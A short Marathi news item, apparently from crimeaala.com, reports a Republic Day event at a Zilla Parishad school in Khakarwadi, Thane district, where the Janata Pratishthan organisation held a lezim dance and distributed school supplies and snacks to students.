जिल्हा परिषद शाळा, खाकरवाडी (खडवली पूर्व), तालुका कल्याण, जिल्हा ठाणे येथे आयोजित या कार्यक्रमात विद्यार्थ्यांसाठी लेझीम नृत्यचे आयोजन करण्यात आले. त्यानंतर विद्यार्थ्यांना वही, पेन, पेन्सिल यांसह शालेय साहित्य तसेच खाऊचे वाटप करण्यात आले. या उपक्रमामुळे विद्यार्थ्यांमध्ये उत्साहाचे वातावरण निर्माण झाले होते.

कार्यक्रम यशस्वी करण्यासाठी जाणता प्रतिष्ठानच्या सर्व सदस्यांनी नियोजन व सहकार्य केले. या सामाजिक उपक्रमाबद्दल संस्थेच्या वतीने सर्व सदस्यांचे आभार मानण्यात आले. समाजातील वंचित घटकांपर्यंत मदत पोहोचविण्याचा हा उपक्रम प्रेरणादायी ठरल्याचे मत उपस्थितांनी व्यक्त केले.

The post समाजसेवेचा आदर्श उपक्रम; प्रजासत्ताक दिनी विद्यार्थ्यांसाठी शैक्षणिक साहित्य वाटप first appeared on crimeaala.com.

]]>